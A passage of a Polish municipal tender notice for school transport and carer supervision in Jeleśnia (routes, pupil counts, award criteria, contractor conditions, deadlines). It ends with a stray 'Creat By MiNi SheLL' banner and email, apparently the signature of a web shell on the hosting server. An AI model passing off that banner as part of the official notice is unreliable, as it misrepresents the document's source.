tj.:<br/><br/>Zadanie IV<br/>- dowóz uczniów do Zespołu Szkół Nr3 w Krzyżowej: 10 uczniów.<br/>Trasa:<br/>1.	Korbielów (ul. Szczyrbok) – Krzyżowa Szkoła.<br/>2.	Krzyżowa Szkoła – Korbielów (ul. Szczyrbok).<br/><br/>2.	W ramach tej części zamówienia:<br/>a. Transport obejmuje dowóz i odbiór dziecka z miejsca zamieszkania do placówki oświatowej i z placówki oświatowej do miejsca zamieszkania wraz z zapewnieniem opieki podczas przejazdu.<br/>b. Dowóz dzieci będzie się odbywał w dniach nauki szkolnej, zgodnie z organizacją zajęć szkolnych w roku szkolnym 2024/2025.<br/>c. Pojazdy wykorzystywane do świadczenia usługi objętej niniejszym zamówieniem muszą być w pełni sprawne, posiadać ważne badania diagnostyczne, zapewniać bezpieczeństwo i komfort pasażerów oraz umożliwiać transport dzieci w wymaganej liczbie miejsc. Pojazdy winny być oznakowane oraz muszą być w nich zapewnione odpowiednie warunki bhp i higieniczne.<br/>d. Osoba sprawująca opiekę nad przewożonymi dziećmi odpowiada za ich bezpieczeństwo podczas przewozu, a także w czasie przejścia z pojazdu do placówki i z placówki do pojazdu.<br/>f. Osoba sprawująca opiekę nad dziećmi musi być przeszkolona w zakresie udzielania pierwszej pomocy lub pierwszej pomocy medycznej lub pierwszej pomocy przedmedycznej.<br/>3.	Zamawiający wymaga, aby osoby skierowane przez wykonawcę lub podwykonawcę do wykonania czynności związanych z opieką nad dziećmi i kierowaniem pojazdów, z wykorzystaniem których świadczony będzie dowóz dzieci, były zatrudnione na podstawie stosunku pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o kryteria: <br/>1)	Najniższa Cena (C): waga kryterium – 60,00 %;<br/>2)	Czas podstawienia pojazdu zastępczego w czasie awarii (P): waga kryterium – 40,00 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w czasie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zapewnienie w okresie od 02.09.2024 r. do 27.06.2025 r. usługi transportu oraz opieki w czasie przewozu uczniów zamieszkałych na terenie gminy Jeleśnia do placówek oświatowych tj.:<br/><br/>Zadanie V<br/>- dowóz uczniów do Zespołu Szkół Nr2 w Jeleśni: 46 uczniów (w okresie zimowym dowóz będzie się odbywał od budynku OSP w Mutnem).<br/>Trasa:<br/>1.	Mutne –Jeleśnia Szkoła.<br/>2.	Jeleśnia Szkoła – Mutne (dwa kursy: pierwszy o godz. 13.40 i drugi o godz.14.40)<br/><br/>2.	W ramach tej części zamówienia:<br/>a. Transport obejmuje dowóz i odbiór dziecka z miejsca zamieszkania do placówki oświatowej i z placówki oświatowej do miejsca zamieszkania wraz z zapewnieniem opieki podczas przejazdu.<br/>b. Dowóz dzieci będzie się odbywał w dniach nauki szkolnej, zgodnie z organizacją zajęć szkolnych w roku szkolnym 2024/2025.<br/>c. Pojazdy wykorzystywane do świadczenia usługi objętej niniejszym zamówieniem muszą być w pełni sprawne, posiadać ważne badania diagnostyczne, zapewniać bezpieczeństwo i komfort pasażerów oraz umożliwiać transport dzieci w wymaganej liczbie miejsc. Pojazdy winny być oznakowane oraz muszą być w nich zapewnione odpowiednie warunki bhp i higieniczne.<br/>d. Osoba sprawująca opiekę nad przewożonymi dziećmi odpowiada za ich bezpieczeństwo podczas przewozu, a także w czasie przejścia z pojazdu do placówki i z placówki do pojazdu.<br/>f. Osoba sprawująca opiekę nad dziećmi musi być przeszkolona w zakresie udzielania pierwszej pomocy lub pierwszej pomocy medycznej lub pierwszej pomocy przedmedycznej.<br/>3.	Zamawiający wymaga, aby osoby skierowane przez wykonawcę lub podwykonawcę do wykonania czynności związanych z opieką nad dziećmi i kierowaniem pojazdów, z wykorzystaniem których świadczony będzie dowóz dzieci, były zatrudnione na podstawie stosunku pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o kryteria: <br/>1)	Najniższa Cena (C): waga kryterium – 60,00 %;<br/>2)	Czas podstawienia pojazdu zastępczego w czasie awarii (P): waga kryterium – 40,00 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w czasie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zapewnienie w okresie od 02.09.2024 r. do 27.06.2025 r. usługi transportu oraz opieki w czasie przewozu uczniów zamieszkałych na terenie gminy Jeleśnia do placówek oświatowych tj.:<br/><br/>Zadanie VI<br/>- dowóz uczniów do Szkoły Podstawowej Nr39 w Bielsku – Białej, ul. Kamienicka 11a: 1 uczeń <br/>Trasa:<br/>1.	Korbielów – Bielsko – Biała (godz. rozpoczęcia zajęć – 7.15)<br/>2.	Bielsko - Biała – Korbielów (godz. zakończenia zajęć – 15.50)<br/><br/>2.	W ramach tej części zamówienia:<br/>a. Transport obejmuje dowóz i odbiór dziecka z miejsca zamieszkania do placówki oświatowej i z placówki oświatowej do miejsca zamieszkania wraz z zapewnieniem opieki podczas przejazdu.<br/>b. Dowóz dzieci będzie się odbywał w dniach nauki szkolnej, zgodnie z organizacją zajęć szkolnych w roku szkolnym 2024/2025.<br/>c. Pojazdy wykorzystywane do świadczenia usługi objętej niniejszym zamówieniem muszą być w pełni sprawne, posiadać ważne badania diagnostyczne, zapewniać bezpieczeństwo i komfort pasażerów oraz umożliwiać transport dzieci w wymaganej liczbie miejsc. Pojazdy winny być oznakowane oraz muszą być w nich zapewnione odpowiednie warunki bhp i higieniczne.<br/>d. Osoba sprawująca opiekę nad przewożonymi dziećmi odpowiada za ich bezpieczeństwo podczas przewozu, a także w czasie przejścia z pojazdu do placówki i z placówki do pojazdu.<br/>f. Osoba sprawująca opiekę nad dziećmi musi być przeszkolona w zakresie udzielania pierwszej pomocy lub pierwszej pomocy medycznej lub pierwszej pomocy przedmedycznej.<br/>3.	Zamawiający wymaga, aby osoby skierowane przez wykonawcę lub podwykonawcę do wykonania czynności związanych z opieką nad dziećmi i kierowaniem pojazdów, z wykorzystaniem których świadczony będzie dowóz dzieci, były zatrudnione na podstawie stosunku pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o kryteria: <br/>1)	Najniższa Cena (C): waga kryterium – 60,00 %;<br/>2)	Czas podstawienia pojazdu zastępczego w czasie awarii (P): waga kryterium – 40,00 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w czasie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zapewnienie w okresie od 02.09.2024 r. do 31.07.2025 r. usługi transportu oraz opieki w czasie przewozu niepełnosprawnych dzieci zamieszkałych na terenie gminy Jeleśnia do placówek oświatowych w Żywcu tj.:<br/><br/>Zadanie VII<br/>- do Centrum Rehabilitacyjno – Edukacyjnego przy ul. Witosa 3:<br/> 6 dzieci z następujących miejscowości: Sopotnia Wielka (2 osoby), Krzyżowa (1 osoba), Przyborów (1 osoba), Pewel Wielka (1 osoba) oraz Sopotnia Mała (1 osoba).<br/>- do Specjalnego Ośrodka Szkolno – Wychowawczego przy ul. Kopernika 77:<br/>6 dzieci z następujących miejscowości: Korbielów (1 osoba), Krzyżówki (1 osoba), Przyborów (1 osoba), Jeleśnia (2 osoby) oraz Mutne (1osoba).<br/><br/>2.	W ramach tej części zamówienia:<br/>a. Transport obejmuje dowóz i odbiór dziecka z miejsca zamieszkania do placówki oświatowej i z placówki oświatowej do miejsca zamieszkania wraz z zapewnieniem opieki podczas przejazdu.<br/>b. Dowóz dzieci będzie się odbywał w dniach nauki szkolnej, zgodnie z organizacją zajęć szkolnych w roku szkolnym 2024/2025.<br/>c. Usługa objęta niniejszym zamówieniem musi być świadczona środkami transportu przystosowanymi do przewozu dzieci niepełnosprawnych tj. pojazd musi spełniać wymogi techniczne umożliwiające załadunek i wyładunek osób z niepełnosprawnością poruszających się na wózku dostosowanym do ich potrzeb (podnośnik hydrauliczny o napędzie elektrycznym lub rampa najazdowa) a także posiadać mocowanie wózków wraz z pasażerem podczas transportu.<br/>d. Pojazdy wykorzystywane do świadczenia usługi objętej niniejszym zamówieniem muszą być w pełni sprawne, posiadać ważne badania diagnostyczne, zapewniać bezpieczeństwo i komfort pasażerów oraz umożliwiać transport dzieci w wymaganej liczbie miejsc. Pojazdy winny być oznakowane oraz muszą być w nich zapewnione odpowiednie warunki bhp i higieniczne.<br/>e. Osoba sprawująca opiekę nad przewożonymi dziećmi odpowiada za ich bezpieczeństwo podczas przewozu, a także w czasie przejścia z pojazdu do placówki i z placówki do pojazdu.<br/>f. Osoba sprawująca opiekę nad dziećmi musi być przeszkolona w zakresie udzielania pierwszej pomocy lub pierwszej pomocy medycznej lub pierwszej pomocy przedmedycznej.<br/>3.	Zamawiający wymaga, aby osoby skierowane przez wykonawcę lub podwykonawcę do wykonania czynności związanych z opieką nad dziećmi i kierowaniem pojazdów, z wykorzystaniem których świadczony będzie dowóz dzieci, były zatrudnione na podstawie stosunku pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60140000-1 - Nieregularny transport osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o kryteria: <br/>1)	Najniższa Cena (C): waga kryterium – 60,00 %;<br/>2)	Czas podstawienia pojazdu zastępczego w czasie awarii (P): waga kryterium – 40,00 %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w czasie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	zdolności do występowania w obrocie gospodarczym:<br/><br/>Dla wszystkich części zamówienia:<br/><br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/><br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Dla wszystkich części zamówienia:<br/><br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/><br/>c)	sytuacji ekonomicznej lub finansowej:<br/><br/>Dla wszystkich części zamówienia:<br/><br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/><br/>d)	zdolności technicznej lub zawodowej:<br/><br/>Dla poszczególnych części zamówienia:<br/><br/>- Warunek dotyczący zdolności zawodowej zostanie spełniony, jeżeli wykonawca wykaże, iż dysponuje narzędziami i urządzeniami technicznymi, tj.: <br/><br/>Dla części zamówienia nr 1 – 6:<br/><br/>niezbędną ilością pojazdów odpowiednich do realizacji niniejszego zamówienia tj. w pełni sprawnych (posiadających ważne badania diagnostyczne), zapewniających bezpieczeństwo i komfort pasażerów oraz umożliwiających transport uczniów zgodnie z podaną ilością na poszczególnej trasie.<br/><br/> Dla części zamówienia nr 7:<br/><br/> co najmniej jednym pojazdem odpowiednim do realizacji niniejszego zamówienia tj. w pełni sprawnym (posiadającym ważne badania diagnostyczne), zapewniającym bezpieczeństwo i komfort pasażerów oraz umożliwiającym transport dzieci zgodnie z podaną ilością oraz spełniający wymogi techniczne umożliwiające załadunek i wyładunek osób z niepełnosprawnością poruszających się na wózku dostosowanym do ich potrzeb (podnośnik hydrauliczny o napędzie elektrycznym lub rampa najazdowa) a także posiadający mocowanie wózków wraz z pasażerem podczas transportu.<br/><br/> W razie złożenia przez Wykonawcę oferty na więcej niż jedną cześć zamówienia, Wykonawca zobowiązany będzie wykazać, że spełnia wszystkie warunki wskazane dla tych wybranych części zamówienia łącznie, tj. dysponować odpowiednią ilością pojazdów łącznie dla wybranych części zamówienia – warunki te kumulują się.<br/> <br/>Zamawiający zastrzega, że wszystkie pojazdy służące do przewozu osób muszą być w pełni sprawne, spełniać wymogi bezpieczeństwa (zgodnie z obowiązującymi przepisami prawa), posiadać aktualne badania techniczne i aktualną polisę ubezpieczeniową. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający nie precyzuje szczegółowych wymagań dotyczących składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia poza wynikającymi z przepisów ustawy Pzp oraz dokumentów zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron, na piśmie pod rygorem nieważności. Przewiduje się możliwość dokonania zmian w umowie na warunkach określonych w ust. 2 - 11 poniżej. Wystąpienie którejkolwiek z poniższych okoliczności nie stanowi zobowiązania Stron do wprowadzenia zmiany umowy.<br/>2. Zakazuje się istotnych zmian postanowień zawartej umowy, o których mowa w 454 ust. 2 ustawy Pzp, chyba że zmiana będzie dotyczyła następujących postanowień umowy w zakresie:<br/>a)	zmiany trasy oraz ilości kursów,<br/>b)	zmiany sposobu lub zakresu wykonywania umowy, w tym także rezygnacja z części zamówienia, przy czym minimalny zakres świadczenie Wykonawcy nie może być niższy od 50% całości umowy, <br/>c)	rozszerzenia lub ograniczenia obowiązków Wykonawcy, wchodzących w zakres przedmiotowy umowy,<br/>d)	zmiany kolejności i terminów wykonywania usług lub ich części, a także zmiany terminu wykonania umowy,<br/>e)	zastąpienie zakresu planowanych do wykonania usług innym zakresem usług przy zachowaniu wymogów jakościowych oraz wymogu zgodności z celem i zasadami realizacji umowy,<br/>f)	zmiany zasad finansowania zadania, w szczególności odnośnie terminów płatności i możliwości wystawiania faktur częściowych, a także zmiany innych warunków płatności,<br/>g)	zmiany wynagrodzenia.<br/>Dalsze zapisy w Projekcie Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać przy pomocy interaktywnego „Formularza ofertowego” udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-20 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com